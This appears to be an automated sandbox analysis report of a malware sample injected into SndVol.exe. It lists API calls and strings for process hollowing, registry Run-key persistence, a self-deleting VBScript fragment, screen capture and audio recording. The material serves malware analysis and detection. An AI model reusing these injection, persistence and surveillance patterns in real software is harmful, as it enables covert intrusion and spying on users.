                                                                        • Instruction Fuzzy Hash:
                                                                        Function 04464072 Relevance: 1.3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PkGNG
                                                                        • API String ID: 0-263838557
                                                                        • Opcode ID: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                                        • Instruction ID: 43807a32d8d952758d492e4c2e703a4a5e4f6a7e28fc20eabd50c0a39835b7d7
                                                                        • Opcode Fuzzy Hash: 06bf94d5155a8a2c30d2bc687d89ecd79ca391a1084a8028b2ee8d7bca9a62ee
                                                                        • Instruction Fuzzy Hash: 53E0B631000258FFCF11AF55DD48A493BAAEB41256F404869F9069A2A3CB35ED82CB99
                                                                        Function 2917FBCD Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: 94cd58e0bdbbcaa00c6fa765c8bce8b5473b2a69a10935b5f588d9862963529e
                                                                        • Instruction ID: 58c1c3252b3cdea570e7dfbab7ebf259c326fb4903373f4ba722b44392a55b43
                                                                        • Opcode Fuzzy Hash: 94cd58e0bdbbcaa00c6fa765c8bce8b5473b2a69a10935b5f588d9862963529e
                                                                        • Instruction Fuzzy Hash: 11A01130300288CBAB00AE33AA0820E3AAEBA00280300C028A002C0A08EB288800AF02
                                                                        Function 29148EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 29148ECB
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 29148ED8
                                                                          • Part of subcall function 29149360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 29149390
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 29148F4E
                                                                        • DeleteDC.GDI32(00000000), ref: 29148F65
                                                                        • DeleteDC.GDI32(00000000), ref: 29148F68
                                                                        • DeleteObject.GDI32(00000000), ref: 29148F6B
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 29148F8C
                                                                        • DeleteDC.GDI32(00000000), ref: 29148F9D
                                                                        • DeleteDC.GDI32(00000000), ref: 29148FA0
                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 29148FC4
                                                                        • GetIconInfo.USER32(?,?), ref: 29148FF8
                                                                        • DeleteObject.GDI32(?), ref: 29149027
                                                                        • DeleteObject.GDI32(?), ref: 29149034
                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 29149041
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 29149077
                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 291490A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 29149110
                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 2914917F
                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 291491A3
                                                                        • DeleteDC.GDI32(?), ref: 291491B7
                                                                        • DeleteDC.GDI32(00000000), ref: 291491BA
                                                                        • DeleteObject.GDI32(00000000), ref: 291491BD
                                                                        • GlobalFree.KERNEL32(?), ref: 291491C8
                                                                        • DeleteObject.GDI32(00000000), ref: 2914927C
                                                                        • GlobalFree.KERNEL32(?), ref: 29149283
                                                                        • DeleteDC.GDI32(?), ref: 29149293
                                                                        • DeleteDC.GDI32(00000000), ref: 2914929E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                        • String ID: DISPLAY
                                                                        • API String ID: 479521175-865373369
                                                                        • Opcode ID: c0e8ae200bb3bdeddafc4c943b3c240fb7369706611e6a4f752652ba93fade76
                                                                        • Instruction ID: 1e8bad6c8d0274c2e39f698b070fbf7bf8adbbe4973de9a69fe4ed1fa576069f
                                                                        • Opcode Fuzzy Hash: c0e8ae200bb3bdeddafc4c943b3c240fb7369706611e6a4f752652ba93fade76
                                                                        • Instruction Fuzzy Hash: B4C15D71A08344AFE314DF22D848B6BBBE9FF88754F40491DF58A97254DB34AA05CB62
                                                                        Function 2914812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 29148171
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29148174
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 29148185
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29148188
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 29148199
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2914819C
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 291481AD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291481B0
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 29148252
                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 2914826A
                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 29148280
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 291482A6
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 29148328
                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 2914833C
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 2914837C
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 29148446
                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 29148463
                                                                        • ResumeThread.KERNEL32(?), ref: 29148470
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 29148487
                                                                        • GetCurrentProcess.KERNEL32(?), ref: 29148492
                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 291484AD
                                                                        • GetLastError.KERNEL32 ref: 291484B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                        • API String ID: 4188446516-3035715614
                                                                        • Opcode ID: 3e872735ee9ecbaeeeb0b596736126d0e54e2d2a5d91b0d80d0246da46222fe2
                                                                        • Instruction ID: caff235fc00146f21e67bf4b0390a5d73a5a9129fe12210a39aa9670449516b2
                                                                        • Opcode Fuzzy Hash: 3e872735ee9ecbaeeeb0b596736126d0e54e2d2a5d91b0d80d0246da46222fe2
                                                                        • Instruction Fuzzy Hash: 99A190B0A04345AFE715DF62CC89F6A7BE9FF48348F001829F685D6191D778DA05CB61
                                                                        Function 2913D45B Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 282registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2914288B: TerminateProcess.KERNEL32(00000000,pth_unenc,2913F903), ref: 2914289B
                                                                          • Part of subcall function 2914288B: WaitForSingleObject.KERNEL32(000000FF), ref: 291428AE
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 2913D558
                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 2913D56B
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 2913D584
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 2913D5B4
                                                                          • Part of subcall function 2913B8E7: TerminateThread.KERNEL32(2913A2B8,00000000,291A52F0,pth_unenc,2913D0F3,291A52D8,291A52F0,?,pth_unenc), ref: 2913B8F6
                                                                          • Part of subcall function 2913B8E7: UnhookWindowsHookEx.USER32(291A50F0), ref: 2913B902
                                                                          • Part of subcall function 2913B8E7: TerminateThread.KERNEL32(2913A2A2,00000000,?,pth_unenc), ref: 2913B910
                                                                          • Part of subcall function 2914C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,29196478,00000000,00000000,2913D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 2914C4C1
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000000), ref: 2913D7FF
                                                                        • ExitProcess.KERNEL32 ref: 2913D80B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                        • API String ID: 1861856835-1536747724
                                                                        • Opcode ID: 67203c14d440d06ea0224849ded419f72c96fe79e2b5ac45767c05337b0c0d78
                                                                        • Instruction ID: 6e3d35253ad1f9f5bc268879b73edc9da65ebdefe8698aaccfaf0620477f8f9b
                                                                        • Opcode Fuzzy Hash: 67203c14d440d06ea0224849ded419f72c96fe79e2b5ac45767c05337b0c0d78
                                                                        • Instruction Fuzzy Hash: B49165316042407AE358E723DC909AF77BD6FA525CFD0982DA44A93194EF20AF4FC65A
                                                                        Function 291424B0 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,291A50E4,00000003), ref: 291424CF
                                                                        • ExitProcess.KERNEL32(00000000), ref: 291424DB
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 29142555
                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 29142564
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 2914256F
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29142576
                                                                        • GetCurrentProcessId.KERNEL32 ref: 2914257C
                                                                        • PathFileExistsW.SHLWAPI(?), ref: 291425AD
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 29142610
                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 2914262A
                                                                        • lstrcatW.KERNEL32(?,.exe), ref: 2914263C
                                                                          • Part of subcall function 2914C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,29196478,00000000,00000000,2913D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 2914C4C1
                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 2914267C
                                                                        • Sleep.KERNEL32(000001F4), ref: 291426BD
                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 291426D2
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 291426DD
                                                                        • CloseHandle.KERNEL32(00000000), ref: 291426E4
                                                                        • GetCurrentProcessId.KERNEL32 ref: 291426EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                        • String ID: .exe$WDH$exepath$open$temp_
                                                                        • API String ID: 2649220323-3088914985
                                                                        • Opcode ID: 14aa75ab18b293b8bb481e291faecd2835925729ffccc02bc77a4ec1e542e0f2
                                                                        • Instruction ID: 578d3f54b0e5dbce35249989e06275cfe3bddcbc07995410c02d125e3d85901f
                                                                        • Opcode Fuzzy Hash: 14aa75ab18b293b8bb481e291faecd2835925729ffccc02bc77a4ec1e542e0f2
                                                                        • Instruction Fuzzy Hash: 7051E671E10209BBFB48A6A2DC98EEE737CAF18318F405455F901A7184EF349F478B64
                                                                        Function 2914B0D8 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 2914B1CD
                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 2914B1E1
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,291960B4), ref: 2914B209
                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,291A4EE0,00000000), ref: 2914B21F
                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 2914B260
                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 2914B278
                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 2914B28D
                                                                        • SetEvent.KERNEL32 ref: 2914B2AA
                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 2914B2BB
                                                                        • CloseHandle.KERNEL32 ref: 2914B2CB
                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 2914B2ED
                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 2914B2F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                        • API String ID: 738084811-1354618412
                                                                        • Opcode ID: c136c9617e9b0258757d763d14ad4f2b823e14440baab6b06cde90fbf2837dec
                                                                        • Instruction ID: 4994e278ab4d9ac2b0af032fda20018f0ac58d616f627660fe7a36a286f20ad8
                                                                        • Opcode Fuzzy Hash: c136c9617e9b0258757d763d14ad4f2b823e14440baab6b06cde90fbf2837dec
                                                                        • Instruction Fuzzy Hash: 2C51D470644244BFE348A737ECD1EAF37ADABA525CF80541DF44A52094EE249F0BC66A
                                                                        Function 2913D0D1 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 260registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2914288B: TerminateProcess.KERNEL32(00000000,pth_unenc,2913F903), ref: 2914289B
                                                                          • Part of subcall function 2914288B: WaitForSingleObject.KERNEL32(000000FF), ref: 291428AE
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,291A52F0,?,pth_unenc), ref: 2913D1E0
                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 2913D1F3
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,291A52F0,?,pth_unenc), ref: 2913D223
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,291A52F0,?,pth_unenc), ref: 2913D232
                                                                          • Part of subcall function 2913B8E7: TerminateThread.KERNEL32(2913A2B8,00000000,291A52F0,pth_unenc,2913D0F3,291A52D8,291A52F0,?,pth_unenc), ref: 2913B8F6
                                                                          • Part of subcall function 2913B8E7: UnhookWindowsHookEx.USER32(291A50F0), ref: 2913B902
                                                                          • Part of subcall function 2913B8E7: TerminateThread.KERNEL32(2913A2A2,00000000,?,pth_unenc), ref: 2913B910
                                                                          • Part of subcall function 2914BA09: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,29196478,2913D248,.vbs,?,?,?,?,?,291A52F0), ref: 2914BA30
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000000), ref: 2913D44D
                                                                        • ExitProcess.KERNEL32 ref: 2913D454
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                        • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                        • API String ID: 3797177996-3018399277
                                                                        • Opcode ID: 93a37b7ea471f2c8fc719ff5002f7380cdbf16f1ac84961acdfe55995a48129e
                                                                        • Instruction ID: 1158572fe03c6cb9269aaf7c97c3d761796ede5c94e2acbff24dff64216733f7
                                                                        • Opcode Fuzzy Hash: 93a37b7ea471f2c8fc719ff5002f7380cdbf16f1ac84961acdfe55995a48129e
                                                                        • Instruction Fuzzy Hash: 688191316182407BE758EB23DC909AF77BD6FA5208FD0981DE04653194EF24AF0FC69A
                                                                        Function 29131A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 29131AD9
                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 29131B03
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 29131B13
                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 29131B23
                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 29131B33
                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 29131B43
                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 29131B54
                                                                        • WriteFile.KERNEL32(00000000,291A2AAA,00000002,00000000,00000000), ref: 29131B65
                                                                        • WriteFile.KERNEL32(00000000,291A2AAC,00000004,00000000,00000000), ref: 29131B75
                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 29131B85
                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 29131B96
                                                                        • WriteFile.KERNEL32(00000000,291A2AB6,00000002,00000000,00000000), ref: 29131BA7
                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 29131BB7
                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 29131BC7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Write$Create
                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                        • API String ID: 1602526932-4212202414
                                                                        • Opcode ID: 6e82a62b5314a26ab7ac2af968bc29b915104214a806bd81dfdf0c2b7a1b972e
                                                                        • Instruction ID: 33ea863b36afc01d22af99b00724dcf727921e62973e62e3a06c90aff245337d
                                                                        • Opcode Fuzzy Hash: 6e82a62b5314a26ab7ac2af968bc29b915104214a806bd81dfdf0c2b7a1b972e
                                                                        • Instruction Fuzzy Hash: 20415F726542087EE210DA52DD85FBBBFECEB85B54F41081AFA44D6080D764EA09DBB3
                                                                        Function 291372AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\SysWOW64\SndVol.exe,00000001,29137688,C:\Windows\SysWOW64\SndVol.exe,00000003,291376B0,291A52D8,29137709), ref: 291372BF
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291372C8
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 291372DD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291372E0
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 291372F1
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291372F4
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 29137305
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29137308
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 29137319
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2913731C
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 2913732D
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29137330
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                        • API String ID: 1646373207-2877372328
                                                                        • Opcode ID: 8a8596f9db649aea04eda75521087148f2955f3f9cb083efce6c0190e20450b3
                                                                        • Instruction ID: 51fd57543e535cd064b0ebd909722d871825248382a3b9d5d26d8c12dde09db0
                                                                        • Opcode Fuzzy Hash: 8a8596f9db649aea04eda75521087148f2955f3f9cb083efce6c0190e20450b3
                                                                        • Instruction Fuzzy Hash: B60179B0F1039A66A7097B77AC94C4F6EEE9E9419C3520837B412E2506DE7CDA01CD74
                                                                        Function 2913CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 2913CE42
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,291A50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 2913CE5B
                                                                        • CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000,00000000,00000000,00000000,?,291A50E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 2913CF0B
                                                                        • _wcslen.LIBCMT ref: 2913CF21
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 2913CFA9
                                                                        • CopyFileW.KERNEL32(C:\Windows\SysWOW64\SndVol.exe,00000000,00000000), ref: 2913CFBF
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 2913CFFE
                                                                        • _wcslen.LIBCMT ref: 2913D001
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 2913D018
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,291A50E4,0000000E), ref: 2913D068
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000001), ref: 2913D086
                                                                        • ExitProcess.KERNEL32 ref: 2913D09D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                        • String ID: 6$C:\Windows\SysWOW64\SndVol.exe$del$open
                                                                        • API String ID: 1579085052-1404393845
                                                                        • Opcode ID: f0df372b2572f12c819a1d0d163ebe6273cdda6e60deda789d8399fc90daf0b6
                                                                        • Instruction ID: 3e7e582a887f2b3b2b0113aa909a7d411197667cf62c2dd705d7e2fac348ae5b
                                                                        • Opcode Fuzzy Hash: f0df372b2572f12c819a1d0d163ebe6273cdda6e60deda789d8399fc90daf0b6
                                                                        • Instruction Fuzzy Hash: FE51DB257083407BE688A6379C90E6E7BBD6FB062DFC0541DF40696181DF249F4BC26E
                                                                        Function 2914C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?), ref: 2914C0C7
                                                                        • _memcmp.LIBVCRUNTIME ref: 2914C0DF
                                                                        • lstrlenW.KERNEL32(?), ref: 2914C0F8
                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 2914C133
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 2914C146
                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 2914C18A
                                                                        • lstrcmpW.KERNEL32(?,?), ref: 2914C1A5
                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 2914C1BD
                                                                        • _wcslen.LIBCMT ref: 2914C1CC
                                                                        • FindVolumeClose.KERNEL32(?), ref: 2914C1EC
                                                                        • GetLastError.KERNEL32 ref: 2914C204
                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 2914C231
                                                                        • lstrcatW.KERNEL32(?,?), ref: 2914C24A
                                                                        • lstrcpyW.KERNEL32(?,?), ref: 2914C259
                                                                        • GetLastError.KERNEL32 ref: 2914C261
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                        • String ID: ?
                                                                        • API String ID: 3941738427-1684325040
                                                                        • Opcode ID: 648ff087625ec5e1450478f750a579e369c824c9f438aa9f67f3fd320e08c490
                                                                        • Instruction ID: dc10b365ce79d076f0719b3d2b7ee21100d4cb16e6c3d226067f6e09e398dfc9
                                                                        • Opcode Fuzzy Hash: 648ff087625ec5e1450478f750a579e369c824c9f438aa9f67f3fd320e08c490
                                                                        • Instruction Fuzzy Hash: 44417F71E08349AAD710AF62D84C9DBB7ECBF88758F00192AF546D2150EB74C7498BA2
                                                                        Function 2917F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 3899193279-0
